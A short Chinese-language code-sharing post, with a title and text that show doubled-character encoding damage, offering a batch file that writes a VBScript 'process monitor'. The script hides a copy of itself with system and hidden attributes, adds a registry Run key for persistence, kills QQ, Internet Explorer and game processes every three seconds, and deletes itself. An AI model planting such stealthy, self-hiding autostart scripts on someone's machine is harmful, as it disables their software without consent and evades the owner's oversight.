進(jìn)程監(jiān)控實(shí)現(xiàn)代碼[vbs+bat]

    這是用BAT寫的，主體是VBS，所以放在VBS分類了
    運(yùn)行后會在%windir%\system32\目錄下生成jk.vbs， 并且自動添加注冊表啟動項(xiàng)，另外在D:\會生成一個(gè)隱藏屬性的JK.VBS， 3秒間隔監(jiān)控進(jìn)程，如果進(jìn)程中有QQ.exe、iexplore.exe、client.exe、game.exe進(jìn)程則會自動結(jié)束進(jìn)程。
    代碼如下:
    @echo off
    attrib -s -h -a -r d:\jk.bat 1>nul 2>nul
    if exist d:\jk.bat del d:\jk.bat /q
    copy %0 d:\jk.bat /y >nul
    attrib +s +h +a +r d:\jk.bat
    if exist %windir%\system32\jk.vbs del %windir%\system32\jk.vbs
    echo y|reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v DATA /t REG_SZ /d c:\windows\system32\jk.vbs >nul
    echo Do>>%windir%\system32\jk.vbs
    echo WScript.Sleep 3000>>%windir%\system32\jk.vbs
    echo strComputer = "." >>%windir%\system32\jk.vbs
    echo Set objWMIService = GetObject("winmgmts:\\" ^& strComputer ^& "\root\CIMV2") >>%windir%\system32\jk.vbs
    echo Set colItems = objWMIService.ExecQuery( _>>%windir%\system32\jk.vbs
    echo "SELECT * FROM Win32_Process",,48)>>%windir%\system32\jk.vbs
    echo For Each objItem in colItems >>%windir%\system32\jk.vbs
    echo If objItem.Name="QQ.exe" Or objItem.Name="iexplore.exe" Or _>>%windir%\system32\jk.vbs
    echo objItem.Name="client.exe" Or objItem.Name="game.exe" _>>%windir%\system32\jk.vbs
    echo Then objitem.Terminate()>>%windir%\system32\jk.vbs
    echo Next>>%windir%\system32\jk.vbs
    echo loop>>%windir%\system32\jk.vbs
    start %windir%\system32\jk.vbs
    del %0 /q